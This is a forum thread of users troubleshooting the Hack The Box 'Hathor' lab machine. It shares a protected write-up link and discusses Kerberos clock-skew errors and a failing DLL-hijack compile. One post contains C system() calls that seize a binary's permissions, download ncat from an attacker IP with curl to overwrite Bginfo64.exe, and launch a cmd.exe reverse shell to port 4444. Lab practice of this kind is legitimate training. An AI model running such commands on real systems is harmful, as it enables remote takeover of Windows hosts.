Return to forum

___user___ · May 2, 2022 at 1:41 PM

https://synisl33t.com/2022/04/20/htb-hathor/

b3ff8d7532eef396a5347ed33933030f

duckpc · May 4, 2022 at 3:19 PM

[quote pid="47077" dateline="1651498911"]
___user___https://synisl33t.com/2022/04/20/htb-hathor/

b3ff8d7532eef396a5347ed33933030f
[/quote]

i can't replace Bginfo64.exe
system("takeown /f C:\\share\\Bginfo64.exe");
system("icacls c:\\share\\Bginfo64.exe /grant everyone:F /T >> c:\\tmp\\1.txt" );
system("curl 10.10.16.14/ncat.exe -o c:\\share\\Bginfo64.exe");
system("C:\\share\\Bginfo64.exe 10.10.16.14 4444 -e cmd.exe");
Bginfo64.exe's time is always 09/19/2019

c:\share\Bginfo64.exe Everyone:F
NT AUTHORITY\IUSR:(ID)N
BUILTIN\IIS_IUSRS:(ID)N
WINDCORP\web:(ID)N
WINDCORP\GinaWild:(ID)(special access:)

Everyone:F but i can't get the shell

___user___ · May 4, 2022 at 3:47 PM

(May 4, 2022, 03:19 PM)duckpc Wrote: [quote pid="47077" dateline="1651498911"]
___user___https://synisl33t.com/2022/04/20/htb-hathor/

b3ff8d7532eef396a5347ed33933030f

Maybe problem with your nc.

https://github.com/int0x33/nc.exe/

duckpc · May 5, 2022 at 8:14 AM

(May 4, 2022, 03:47 PM)___user___ Wrote:
(May 4, 2022, 03:19 PM)鸭子 Wrote: [quote pid="47077" dateline="1651498911"]
___user___https：//synisl33t.com/2022/04/20/htb-hathor/

b3ff8d7532eef396a5347ed33933030f

也许是你的nc有问题。

https://github.com/int0x33/nc.exe/

[/quote]
Ok, thank you i got it, but i don't know why?

Cipher · May 6, 2022 at 12:15 PM

(April 20, 2022, 05:02 PM)___user___ Wrote: https://synisl33t.com/2022/04/20/htb-hathor/

Protected Write-up

help

(April 20, 2022, 07:38 PM)udontknowme Wrote:
(April 20, 2022, 05:02 PM)___user___ Wrote: https://synisl33t.com/2022/04/20/htb-hathor/

Protected Write-up

Anyone can share password please? (hash)
Thanks.

give me too

cavour12 · May 7, 2022 at 9:17 AM

Anyone with this error like this?

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

i saw that is a problem with rhe sync time with server i tried ntpdate no luck

any suggestion will be great

Cipher · May 7, 2022 at 4:29 PM

i got shell, now what is the next step..

rusqq · May 7, 2022 at 4:57 PM

(May 7, 2022, 09:17 AM)cavour12 Wrote: Anyone with this error like this?
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
i saw that is a problem with rhe sync time with server i tried ntpdate no luck

any suggestion will be great

Same problem, ntpdate didn't help...

Cipher · May 7, 2022 at 7:39 PM

x86_64-w64-mingw32-gcc -shared -o 7-zip64.dll dll.c
x86_64-w64-mingw32-gcc: error: dll.c: No such file or directory
x86_64-w64-mingw32-gcc: fatal error: no input files
compilation terminated.

or
dll.c: In function ‘DllMain’:
dll.c:6:1: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘{’ token
6 | {
| ^
dll.c:21: error: expected ‘{’ at end of input
21 | }
|

help :( :blush: :s

Cipher · May 7, 2022 at 9:04 PM

anyone can provide me dll.c